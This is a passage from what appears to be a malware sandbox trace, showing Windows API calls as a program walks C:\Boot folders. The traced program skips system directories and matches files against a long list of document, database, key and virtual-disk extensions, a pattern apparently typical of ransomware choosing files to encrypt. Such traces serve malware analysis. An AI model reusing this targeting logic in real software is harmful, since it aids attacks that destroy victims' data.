pszDir="C:\\Boot\\cs-CZ", pszFile="*" | out: pszDest="C:\\Boot\\cs-CZ\\*") returned="C:\\Boot\\cs-CZ\\*" [0019.579] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.580] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.580] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.580] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.580] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.580] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.580] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\cs-CZ", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" [0019.580] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0019.580] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.580] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.580] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.580] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.580] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.580] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="da-DK" | out: pszDest="C:\\Boot\\da-DK") returned="C:\\Boot\\da-DK" [0019.580] StrStrIW (lpFirst="C:\\Boot\\da-DK", lpSrch="\\Windows") returned 0x0 [0019.580] StrStrIW (lpFirst="C:\\Boot\\da-DK", lpSrch="\\Program Files") returned 0x0 [0019.580] StrStrIW (lpFirst="C:\\Boot\\da-DK", lpSrch="\\ProgramData") returned 0x0 [0019.580] StrStrIW (lpFirst="C:\\Boot\\da-DK", lpSrch="\\AppData") returned 0x0 [0019.580] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\Boot\\da-DK", pszFile="*" | out: pszDest="C:\\Boot\\da-DK\\*") returned="C:\\Boot\\da-DK\\*" [0019.581] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.581] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.581] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.581] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.581] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.581] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.581] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\da-DK", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned="C:\\Boot\\da-DK\\bootmgr.exe.mui" [0019.581] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0019.581] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.581] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.581] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.581] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.581] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.581] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="de-DE" | out: pszDest="C:\\Boot\\de-DE") returned="C:\\Boot\\de-DE" [0019.581] StrStrIW (lpFirst="C:\\Boot\\de-DE", lpSrch="\\Windows") returned 0x0 [0019.581] StrStrIW (lpFirst="C:\\Boot\\de-DE", lpSrch="\\Program Files") returned 0x0 [0019.581] StrStrIW (lpFirst="C:\\Boot\\de-DE", lpSrch="\\ProgramData") returned 0x0 [0019.581] StrStrIW (lpFirst="C:\\Boot\\de-DE", lpSrch="\\AppData") returned 0x0 [0019.582] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\Boot\\de-DE", pszFile="*" | out: pszDest="C:\\Boot\\de-DE\\*") returned="C:\\Boot\\de-DE\\*" [0019.582] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.582] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.582] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.582] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.582] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.582] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.582] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\de-DE", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned="C:\\Boot\\de-DE\\bootmgr.exe.mui" [0019.582] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0019.583] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.583] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.583] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.583] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.583] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.583] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="el-GR" | out: pszDest="C:\\Boot\\el-GR") returned="C:\\Boot\\el-GR" [0019.583] StrStrIW (lpFirst="C:\\Boot\\el-GR", lpSrch="\\Windows") returned 0x0 [0019.583] StrStrIW (lpFirst="C:\\Boot\\el-GR", lpSrch="\\Program Files") returned 0x0 [0019.583] StrStrIW (lpFirst="C:\\Boot\\el-GR", lpSrch="\\ProgramData") returned 0x0 [0019.583] StrStrIW (lpFirst="C:\\Boot\\el-GR", lpSrch="\\AppData") returned 0x0 [0019.583] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\Boot\\el-GR", pszFile="*" | out: pszDest="C:\\Boot\\el-GR\\*") returned="C:\\Boot\\el-GR\\*" [0019.583] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.583] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.583] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.583] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.583] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.583] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.583] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\el-GR", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned="C:\\Boot\\el-GR\\bootmgr.exe.mui" [0019.583] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0019.583] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.584] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.584] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.584] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.584] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.584] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="en-US" | out: pszDest="C:\\Boot\\en-US") returned="C:\\Boot\\en-US" [0019.584] StrStrIW (lpFirst="C:\\Boot\\en-US", lpSrch="\\Windows") returned 0x0 [0019.584] StrStrIW (lpFirst="C:\\Boot\\en-US", lpSrch="\\Program Files") returned 0x0 [0019.584] StrStrIW (lpFirst="C:\\Boot\\en-US", lpSrch="\\ProgramData") returned 0x0 [0019.584] StrStrIW (lpFirst="C:\\Boot\\en-US", lpSrch="\\AppData") returned 0x0 [0019.584] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\Boot\\en-US", pszFile="*" | out: pszDest="C:\\Boot\\en-US\\*") returned="C:\\Boot\\en-US\\*" [0019.584] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.585] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.585] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.585] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.585] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.585] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.585] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\en-US", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\en-US\\bootmgr.exe.mui") returned="C:\\Boot\\en-US\\bootmgr.exe.mui" [0019.585] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0019.585] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.585] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.585] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.585] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\en-US", pszFile="memtest.exe.mui" | out: pszDest="C:\\Boot\\en-US\\memtest.exe.mui") returned="C:\\Boot\\en-US\\memtest.exe.mui" [0019.585] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0019.585] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.585] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.585] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.585] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.585] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.585] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="es-ES" | out: pszDest="C:\\Boot\\es-ES") returned="C:\\Boot\\es-ES" [0019.585] StrStrIW (lpFirst="C:\\Boot\\es-ES", lpSrch="\\Windows") returned 0x0 [0019.585] StrStrIW (lpFirst="C:\\Boot\\es-ES", lpSrch="\\Program Files") returned 0x0 [0019.585] StrStrIW (lpFirst="C:\\Boot\\es-ES", lpSrch="\\ProgramData") returned 0x0 [0019.585] StrStrIW (lpFirst="C:\\Boot\\es-ES", lpSrch="\\AppData") returned 0x0 [0019.585] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\Boot\\es-ES", pszFile="*" | out: pszDest="C:\\Boot\\es-ES\\*") returned="C:\\Boot\\es-ES\\*" [0019.585] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.586] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.586] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.586] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.586] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.586] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.586] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\es-ES", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned="C:\\Boot\\es-ES\\bootmgr.exe.mui" [0019.586] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0019.586] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.586] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.586] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.586] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.586] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.587] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="fi-FI" | out: pszDest="C:\\Boot\\fi-FI") returned="C:\\Boot\\fi-FI" [0019.587] StrStrIW (lpFirst="C:\\Boot\\fi-FI", lpSrch="\\Windows") returned 0x0 [0019.587] StrStrIW (lpFirst="C:\\Boot\\fi-FI", lpSrch="\\Program Files") returned 0x0 [0019.587] StrStrIW (lpFirst="C:\\Boot\\fi-FI", lpSrch="\\ProgramData") returned 0x0 [0019.587] StrStrIW (lpFirst="C:\\Boot\\fi-FI", lpSrch="\\AppData") returned 0x0 [0019.587] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\Boot\\fi-FI", pszFile="*" | out: pszDest="C:\\Boot\\fi-FI\\*") returned="C:\\Boot\\fi-FI\\*" [0019.587] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.587] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.587] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.587] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.587] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.587] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.587] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\fi-FI", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned="C:\\Boot\\fi-FI\\bootmgr.exe.mui" [0019.587] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0019.587] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.587] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.587] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.587] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.587] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.587] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="Fonts" | out: pszDest="C:\\Boot\\Fonts") returned="C:\\Boot\\Fonts" [0019.587] StrStrIW (lpFirst="C:\\Boot\\Fonts", lpSrch="\\Windows") returned 0x0 [0019.587] StrStrIW (lpFirst="C:\\Boot\\Fonts", lpSrch="\\Program Files") returned 0x0 [0019.588] StrStrIW (lpFirst="C:\\Boot\\Fonts", lpSrch="\\ProgramData") returned 0x0 [0019.588] StrStrIW (lpFirst="C:\\Boot\\Fonts", lpSrch="\\AppData") returned 0x0 [0019.588] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\Boot\\Fonts", pszFile="*" | out: pszDest="C:\\Boot\\Fonts\\*") returned="C:\\Boot\\Fonts\\*" [0019.588] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.588] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.588] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.588] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.588] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.588] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.589] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\Fonts", pszFile="chs_boot.ttf" | out: pszDest="C:\\Boot\\Fonts\\chs_boot.ttf") returned="C:\\Boot\\Fonts\\chs_boot.ttf" [0019.589] PathFindExtensionW (pszPath="chs_boot.ttf") returned=".ttf" [0019.589] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".ttf.") returned 0x0 [0019.589] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.589] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.589] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\Fonts", pszFile="cht_boot.ttf" | out: pszDest="C:\\Boot\\Fonts\\cht_boot.ttf") returned="C:\\Boot\\Fonts\\cht_boot.ttf" [0019.589] PathFindExtensionW (pszPath="cht_boot.ttf") returned=".ttf" [0019.589] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".ttf.") returned 0x0 [0019.589] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.589] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.589] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\Fonts", pszFile="jpn_boot.ttf" | out: pszDest="C:\\Boot\\Fonts\\jpn_boot.ttf") returned="C:\\Boot\\Fonts\\jpn_boot.ttf" [0019.589] PathFindExtensionW (pszPath="jpn_boot.ttf") returned=".ttf" [0019.589] StrStrIW 